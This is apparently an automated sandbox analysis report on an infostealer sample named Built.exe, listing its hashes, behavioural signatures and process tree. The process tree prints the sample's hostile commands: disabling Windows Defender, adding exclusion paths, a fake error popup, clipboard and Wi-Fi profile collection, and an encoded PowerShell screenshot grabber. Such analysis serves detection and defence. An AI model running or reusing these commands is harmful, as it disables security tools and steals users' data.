Analysis
-
max time kernel
92s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 14:03
Behavioral task
behavioral1
Sample
Built.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
Built.exe
Resource
win10v2004-20241007-en
General
-
Target
Built.exe
-
Size
11.2MB
-
MD5
51e01deea9646f22b3b6c23745a79eb1
-
SHA1
3ba8405cc4b8689aea66c06830c10eac1fb45906
-
SHA256
3358a417f4cf63296c9e7ce5802cecd115cde629fb6252c9afc395619020b839
-
SHA512
d66f54a85508c2e04c7e6f06b6586d415668b434302c70fe5ef80a56f69e601691adaa83d6a8b96c58ece0136e61f1dd455afa02c000f3f84c52dcc0a7f418c9
-
SSDEEP
196608:9FHYYOTOZN4Gq6p/yyMrJfuehrwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/s:TP1q6p/fMrJfDqIHziK1piXLGVE4Ue0g
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3672 powershell.exe 1204 powershell.exe 4748 powershell.exe 4196 powershell.exe 4656 powershell.exe 3992 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 2 IoCs
Processes:
bound.exerar.exepid Process 4968 bound.exe 3648 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
Built.exepid Process 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe 2948 Built.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 21 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid Process 948 tasklist.exe 2416 tasklist.exe 3844 tasklist.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023ca4-22.dat upx behavioral2/memory/2948-26-0x00007FFB66750000-0x00007FFB66DB3000-memory.dmp upx behavioral2/files/0x0007000000023ca2-30.dat upx behavioral2/files/0x0007000000023c96-28.dat upx behavioral2/files/0x0007000000023c9d-49.dat upx behavioral2/memory/2948-50-0x00007FFB7F120000-0x00007FFB7F12F000-memory.dmp upx behavioral2/files/0x0007000000023c9c-48.dat upx behavioral2/files/0x0007000000023c9b-47.dat upx behavioral2/files/0x0007000000023c9a-46.dat upx behavioral2/files/0x0007000000023c99-45.dat upx behavioral2/files/0x0007000000023c98-44.dat upx behavioral2/files/0x0007000000023c97-43.dat upx behavioral2/files/0x0007000000023c95-42.dat upx behavioral2/files/0x0007000000023ca9-41.dat upx behavioral2/files/0x0007000000023ca8-40.dat upx behavioral2/files/0x0007000000023ca7-39.dat upx behavioral2/files/0x0007000000023ca3-36.dat upx behavioral2/files/0x0007000000023ca1-35.dat upx behavioral2/memory/2948-31-0x00007FFB75E70000-0x00007FFB75E97000-memory.dmp upx behavioral2/memory/2948-56-0x00007FFB73E70000-0x00007FFB73E9B000-memory.dmp upx behavioral2/memory/2948-58-0x00007FFB74F70000-0x00007FFB74F89000-memory.dmp upx behavioral2/memory/2948-60-0x00007FFB71AF0000-0x00007FFB71B15000-memory.dmp upx behavioral2/memory/2948-62-0x00007FFB65B10000-0x00007FFB65C8F000-memory.dmp upx behavioral2/memory/2948-64-0x00007FFB7BE40000-0x00007FFB7BE59000-memory.dmp upx behavioral2/memory/2948-66-0x00007FFB766F0000-0x00007FFB766FD000-memory.dmp upx behavioral2/memory/2948-68-0x00007FFB75960000-0x00007FFB75994000-memory.dmp upx behavioral2/memory/2948-73-0x00007FFB665C0000-0x00007FFB6668E000-memory.dmp upx behavioral2/memory/2948-72-0x00007FFB66750000-0x00007FFB66DB3000-memory.dmp upx behavioral2/memory/2948-75-0x00007FFB655D0000-0x00007FFB65B03000-memory.dmp upx behavioral2/memory/2948-76-0x00007FFB75E70000-0x00007FFB75E97000-memory.dmp upx behavioral2/memory/2948-80-0x00007FFB73E70000-0x00007FFB73E9B000-memory.dmp upx behavioral2/memory/2948-81-0x00007FFB76060000-0x00007FFB7606D000-memory.dmp upx behavioral2/memory/2948-78-0x00007FFB75420000-0x00007FFB75434000-memory.dmp upx behavioral2/memory/2948-87-0x00007FFB66500000-0x00007FFB665B3000-memory.dmp upx behavioral2/memory/2948-128-0x00007FFB71AF0000-0x00007FFB71B15000-memory.dmp upx behavioral2/memory/2948-233-0x00007FFB65B10000-0x00007FFB65C8F000-memory.dmp upx behavioral2/memory/2948-333-0x00007FFB75960000-0x00007FFB75994000-memory.dmp upx behavioral2/memory/2948-342-0x00007FFB665C0000-0x00007FFB6668E000-memory.dmp upx behavioral2/memory/2948-354-0x00007FFB655D0000-0x00007FFB65B03000-memory.dmp upx behavioral2/memory/2948-366-0x00007FFB66750000-0x00007FFB66DB3000-memory.dmp upx behavioral2/memory/2948-380-0x00007FFB66500000-0x00007FFB665B3000-memory.dmp upx behavioral2/memory/2948-372-0x00007FFB65B10000-0x00007FFB65C8F000-memory.dmp upx behavioral2/memory/2948-395-0x00007FFB66500000-0x00007FFB665B3000-memory.dmp upx behavioral2/memory/2948-396-0x00007FFB655D0000-0x00007FFB65B03000-memory.dmp upx behavioral2/memory/2948-394-0x00007FFB76060000-0x00007FFB7606D000-memory.dmp upx behavioral2/memory/2948-393-0x00007FFB75420000-0x00007FFB75434000-memory.dmp upx behavioral2/memory/2948-391-0x00007FFB665C0000-0x00007FFB6668E000-memory.dmp upx behavioral2/memory/2948-390-0x00007FFB75960000-0x00007FFB75994000-memory.dmp upx behavioral2/memory/2948-389-0x00007FFB766F0000-0x00007FFB766FD000-memory.dmp upx behavioral2/memory/2948-388-0x00007FFB7BE40000-0x00007FFB7BE59000-memory.dmp upx behavioral2/memory/2948-387-0x00007FFB65B10000-0x00007FFB65C8F000-memory.dmp upx behavioral2/memory/2948-386-0x00007FFB71AF0000-0x00007FFB71B15000-memory.dmp upx behavioral2/memory/2948-385-0x00007FFB74F70000-0x00007FFB74F89000-memory.dmp upx behavioral2/memory/2948-384-0x00007FFB73E70000-0x00007FFB73E9B000-memory.dmp upx behavioral2/memory/2948-383-0x00007FFB7F120000-0x00007FFB7F12F000-memory.dmp upx behavioral2/memory/2948-382-0x00007FFB75E70000-0x00007FFB75E97000-memory.dmp upx behavioral2/memory/2948-381-0x00007FFB66750000-0x00007FFB66DB3000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3672 powershell.exe 4196 powershell.exe 4656 powershell.exe 4656 powershell.exe 3992 powershell.exe 3992 powershell.exe 3672 powershell.exe 3672 powershell.exe 4196 powershell.exe 4196 powershell.exe 3992 powershell.exe 3992 powershell.exe 4656 powershell.exe 4656 powershell.exe 3600 powershell.exe 3600 powershell.exe 60 powershell.exe 60 powershell.exe 60 powershell.exe 3600 powershell.exe 1204 powershell.exe 1204 powershell.exe 1056 powershell.exe 1056 powershell.exe 4748 powershell.exe 4748 powershell.exe 3452 powershell.exe 3452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exepowershell.exepowershell.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 3672 powershell.exe Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 3992 powershell.exe Token: SeDebugPrivilege 2416 tasklist.exe Token: SeDebugPrivilege 948 tasklist.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe Token: 34 2120 WMIC.exe Token: 35 2120 WMIC.exe Token: 36 2120 WMIC.exe Token: SeDebugPrivilege 3600 powershell.exe Token: SeIncreaseQuotaPrivilege 2120 WMIC.exe Token: SeSecurityPrivilege 2120 WMIC.exe Token: SeTakeOwnershipPrivilege 2120 WMIC.exe Token: SeLoadDriverPrivilege 2120 WMIC.exe Token: SeSystemProfilePrivilege 2120 WMIC.exe Token: SeSystemtimePrivilege 2120 WMIC.exe Token: SeProfSingleProcessPrivilege 2120 WMIC.exe Token: SeIncBasePriorityPrivilege 2120 WMIC.exe Token: SeCreatePagefilePrivilege 2120 WMIC.exe Token: SeBackupPrivilege 2120 WMIC.exe Token: SeRestorePrivilege 2120 WMIC.exe Token: SeShutdownPrivilege 2120 WMIC.exe Token: SeDebugPrivilege 2120 WMIC.exe Token: SeSystemEnvironmentPrivilege 2120 WMIC.exe Token: SeRemoteShutdownPrivilege 2120 WMIC.exe Token: SeUndockPrivilege 2120 WMIC.exe Token: SeManageVolumePrivilege 2120 WMIC.exe Token: 33 2120 WMIC.exe Token: 34 2120 WMIC.exe Token: 35 2120 WMIC.exe Token: 36 2120 WMIC.exe Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 3844 tasklist.exe Token: SeDebugPrivilege 1204 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeIncreaseQuotaPrivilege 2484 WMIC.exe Token: SeSecurityPrivilege 2484 WMIC.exe Token: SeTakeOwnershipPrivilege 2484 WMIC.exe Token: SeLoadDriverPrivilege 2484 WMIC.exe Token: SeSystemProfilePrivilege 2484 WMIC.exe Token: SeSystemtimePrivilege 2484 WMIC.exe Token: SeProfSingleProcessPrivilege 2484 WMIC.exe Token: SeIncBasePriorityPrivilege 2484 WMIC.exe Token: SeCreatePagefilePrivilege 2484 WMIC.exe Token: SeBackupPrivilege 2484 WMIC.exe Token: SeRestorePrivilege 2484 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
bound.exepid Process 4968 bound.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Built.exeBuilt.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 1312 wrote to memory of 2948 1312 Built.exe 83 PID 1312 wrote to memory of 2948 1312 Built.exe 83 PID 2948 wrote to memory of 2392 2948 Built.exe 87 PID 2948 wrote to memory of 2392 2948 Built.exe 87 PID 2948 wrote to memory of 4804 2948 Built.exe 88 PID 2948 wrote to memory of 4804 2948 Built.exe 88 PID 2948 wrote to memory of 1020 2948 Built.exe 91 PID 2948 wrote to memory of 1020 2948 Built.exe 91 PID 2948 wrote to memory of 1164 2948 Built.exe 92 PID 2948 wrote to memory of 1164 2948 Built.exe 92 PID 2948 wrote to memory of 1668 2948 Built.exe 93 PID 2948 wrote to memory of 1668 2948 Built.exe 93 PID 2948 wrote to memory of 2844 2948 Built.exe 94 PID 2948 wrote to memory of 2844 2948 Built.exe 94 PID 2392 wrote to memory of 4196 2392 cmd.exe 99 PID 2392 wrote to memory of 4196 2392 cmd.exe 99 PID 4804 wrote to memory of 3672 4804 cmd.exe 100 PID 4804 wrote to memory of 3672 4804 cmd.exe 100 PID 2948 wrote to memory of 4912 2948 Built.exe 101 PID 2948 wrote to memory of 4912 2948 Built.exe 101 PID 2844 wrote to memory of 4656 2844 cmd.exe 102 PID 2844 wrote to memory of 4656 2844 cmd.exe 102 PID 1668 wrote to memory of 3952 1668 cmd.exe 103 PID 1668 wrote to memory of 3952 1668 cmd.exe 103 PID 2948 wrote to memory of 3808 2948 Built.exe 104 PID 2948 wrote to memory of 3808 2948 Built.exe 104 PID 1164 wrote to memory of 4968 1164 cmd.exe 105 PID 1164 wrote to memory of 4968 1164 cmd.exe 105 PID 1020 wrote to memory of 3992 1020 cmd.exe 108 PID 1020 wrote to memory of 3992 1020 cmd.exe 108 PID 3808 wrote to memory of 2416 3808 cmd.exe 109 PID 3808 wrote to memory of 2416 3808 cmd.exe 109 PID 4912 wrote to memory of 948 4912 cmd.exe 110 PID 4912 wrote to memory of 948 4912 cmd.exe 110 PID 2948 wrote to memory of 1848 2948 Built.exe 111 PID 2948 wrote to memory of 1848 2948 Built.exe 111 PID 2948 wrote to memory of 3620 2948 Built.exe 157 PID 2948 wrote to memory of 3620 2948 Built.exe 157 PID 2948 wrote to memory of 720 2948 Built.exe 114 PID 2948 wrote to memory of 720 2948 Built.exe 114 PID 2948 wrote to memory of 3104 2948 Built.exe 136 PID 2948 wrote to memory of 3104 2948 Built.exe 136 PID 2948 wrote to memory of 3032 2948 Built.exe 117 PID 2948 wrote to memory of 3032 2948 Built.exe 117 PID 2948 wrote to memory of 3584 2948 Built.exe 119 PID 2948 wrote to memory of 3584 2948 Built.exe 119 PID 2948 wrote to memory of 2924 2948 Built.exe 123 PID 2948 wrote to memory of 2924 2948 Built.exe 123 PID 1848 wrote to memory of 2120 1848 cmd.exe 126 PID 1848 wrote to memory of 2120 1848 cmd.exe 126 PID 3032 wrote to memory of 2684 3032 cmd.exe 127 PID 3032 wrote to memory of 2684 3032 cmd.exe 127 PID 3584 wrote to memory of 3932 3584 cmd.exe 128 PID 3584 wrote to memory of 3932 3584 cmd.exe 128 PID 3620 wrote to memory of 3600 3620 cmd.exe 129 PID 3620 wrote to memory of 3600 3620 cmd.exe 129 PID 3104 wrote to memory of 5116 3104 cmd.exe 130 PID 3104 wrote to memory of 5116 3104 cmd.exe 130 PID 2924 wrote to memory of 60 2924 cmd.exe 131 PID 2924 wrote to memory of 60 2924 cmd.exe 131 PID 720 wrote to memory of 3844 720 cmd.exe 132 PID 720 wrote to memory of 3844 720 cmd.exe 132 PID 2948 wrote to memory of 3144 2948 Built.exe 150 PID 2948 wrote to memory of 3144 2948 Built.exe 150
Processes
-
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\Built.exe"C:\Users\Admin\AppData\Local\Temp\Built.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Missing file in code number 14: No file named install packages', 0, 'Error', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Missing file in code number 14: No file named install packages', 0, 'Error', 0+16);close()"4⤵PID:3952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:5116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
